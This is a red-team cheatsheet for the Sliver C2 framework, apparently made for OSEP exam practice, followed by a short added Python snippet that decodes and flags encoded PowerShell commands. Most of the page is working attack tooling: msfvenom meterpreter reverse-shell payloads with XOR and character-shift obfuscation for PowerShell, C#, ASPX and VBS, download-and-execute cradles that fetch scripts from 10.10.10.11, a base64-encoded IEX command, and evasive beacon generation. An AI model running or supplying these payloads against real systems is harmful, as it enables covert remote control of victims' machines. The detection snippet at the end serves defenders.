Cheatsheet
Visit the Sliver releases page and install the pre-compiled server and client for your OS. Sliver also lets multiple operators join using profiles, since each operator can be generated using a different profile.
Server
# Install the suitable binary for your OS (Linux in this instance)
wget -q https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-server_linux
chmod +x ./sliver-server_linux
./sliver-server_linux
Armory packages
Armory contains a set of pre-installed .NET binaries ready to use for the client and server components.
sliver > armory install all
? Install 21 aliases and 140 extensions? Yes
[*] Installing alias 'SharPersist' (v0.0.2) ... done!
... Complete output at the end ...
Sliver listeners
64 bit shell
profiles new --http 10.10.10.11:8088 --format shellcode osep
stage-listener --url tcp://10.10.10.11:4443 --profile osep
http -L 10.10.10.11 --lport 8088
32 bit shell
profiles new --http 10.10.10.11:9090 --format shellcode -a x86 osepx86
stage-listener --url tcp://10.10.10.11:5553 --profile osepx86
http -L 10.10.10.11 --lport 9090
Lateral movement
profiles new --http 10.10.10.11:8099 --format service osep-lateral
http -L 10.10.10.11 --lport 8099
Payloads
To be used with the files in the payloads directory: https://github.com/Anon-Exploiter/sliver-cheatsheet/tree/main/payloads - With these one-liners, you no longer need to XOR-encrypt your shellcode manually afterwards using the C# code given in the course.
XOR encryption with 2
# Payloads
# 64 bit shell
sudo msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4443 EXITFUNC=thread -f raw -o /home/kali/OSEP/hav0c/sliver.x64.bin
# PowerShell Payload
sudo msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4443 EXITFUNC=thread -f raw | xxd -ps -c 1 | python3 -c 'import sys; key = 2; print("[Byte[]] $buf = " + ",".join([f"0x{(int(x, 16) ^ key):02X}" for x in sys.stdin.read().split()]))'
# C#
sudo msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4443 EXITFUNC=thread -f raw | python3 -c 'key = 2; import sys; data = sys.stdin.buffer.read(); encrypted = bytes([b ^ key for b in data]); print(f"byte[] buf = new byte[{len(encrypted)}] {{ " + ", ".join([f"0x{b:02X}" for b in encrypted]) + " };")'
# ASPX Payloads
sudo msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4443 EXITFUNC=thread -f raw | python3 -c 'key = 2; import sys; data = sys.stdin.buffer.read(); encrypted = bytes([b ^ key for b in data]); print(f"byte[] vL8fwOy_ = new byte[{len(encrypted)}] {{ " + ",".join([f"0x{b:02X}" for b in encrypted]) + " };")'
# VB - character shift by 17 (each character becomes a 3-digit decimal; this is an additive shift, not XOR)
payload="cv2.docm"
python3 -c "payload=\"$payload\"; print(''.join(f'{ord(char) + 17:03}' for char in payload))"
payload="powershell -exec bypass -nop -w hidden -c iex((new-object system.net.webclient).downloadstring('http://10.10.10.11/hav0c-ps.txt'))"
python3 -c "payload=\"$payload\"; print(''.join(f'{ord(char) + 17:03}' for char in payload))"
# PowerShell Session
echo -en "(New-Object System.Net.WebClient).DownloadString('http://10.10.10.11/hav0c-ps.txt') | IEX" | iconv -t UTF-16LE | base64 -w 0
powershell -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQAwAC4AMQAxAC8AaABhAHYAMABjAC0AcABzAC4AdAB4AHQAJwApACAAfAAgAEkARQBYAA==
# --
# 32 bit shell
sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=5553 EXITFUNC=thread -f raw -o /home/kali/OSEP/hav0c/sliver.x86.bin
# VBS payload
sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=5553 EXITFUNC=thread -f raw | xxd -ps -c 1 | python3 -c 'import sys; key = 2; data = [str(int(x, 16) ^ key) for x in sys.stdin.read().split()]; chunk_size = 50; chunks = [data[i:i + chunk_size] for i in range(0, len(data), chunk_size)]; print("buf = Array(", end=""); print(", _\n".join([", ".join(chunk) for chunk in chunks]) + ")")'
# PowerShell payload
sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=5553 EXITFUNC=thread -f raw | xxd -ps -c 1 | python3 -c 'import sys; key = 2; print("[Byte[]] $buf = " + ",".join([f"0x{(int(x, 16) ^ key):02X}" for x in sys.stdin.read().split()]))'
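From the detection side, the command line produced by the PowerShell Session one-liner above can be triaged by reversing the same UTF-16LE + base64 transform and inspecting the decoded script. This is an added example, not part of the original cheatsheet; the function names, the sample command lines and the 192.0.2.10 address are constructed for illustration.

```python
import base64
import binascii
import re

# "-e", "-ec", "-enc" ... "-EncodedCommand" followed by a base64 token.
FLAG = re.compile(r"(?i)\s-(e[a-z]*)\s+([A-Za-z0-9+/=]{8,})")
# Download-and-execute markers taken from the one-liner on this page.
CRADLE = re.compile(r"(?i)downloadstring|net\.webclient|\biex\b|invoke-expression")


def decode_encoded_command(cmdline):
    """Return the decoded script from a PowerShell command line, or None."""
    for name, token in FLAG.findall(cmdline):
        name = name.lower()
        if name != "ec" and not "encodedcommand".startswith(name):
            continue  # e.g. -exec / -ExecutionPolicy, not an encoded command
        try:
            return base64.b64decode(token, validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            return None  # flag present but the argument is not valid input
    return None


def triage(cmdline):
    """Classify one process-creation command line; returns (verdict, script)."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return ("no-encoded-command", None)
    verdict = "download-cradle" if CRADLE.search(script) else "encoded-other"
    return (verdict, script)


def encode_command(script):
    # Same transform as `iconv -t UTF-16LE | base64 -w 0`; used to build samples.
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample command lines (192.0.2.0/24 is a documentation range).
SAMPLES = [
    "powershell.exe -nop -w hidden -enc " + encode_command(
        "(New-Object System.Net.WebClient).DownloadString('http://192.0.2.10/a.txt') | IEX"),
    "powershell.exe -EncodedCommand " + encode_command("Get-Date"),
    "powershell.exe -exec bypass -File C:\\Scripts\\backup.ps1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        verdict, script = triage(line)
        print(f"{verdict:20} {script or line}")
```

In practice the input would be process-creation events (for example Windows Event ID 4688 or Sysmon Event ID 1 command lines) rather than the inline samples.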
Sliver implant
# Create listener (if one doesn't exist already)
profiles new --http 10.10.10.11:8088 --format shellcode osep
http -L 10.10.10.11 --lport 8088
# Generate beacon .exe
generate beacon --http 10.10.250.10:8088 --name sliver.obfuscated --os windows --seconds 5 --jitter 0 --evasion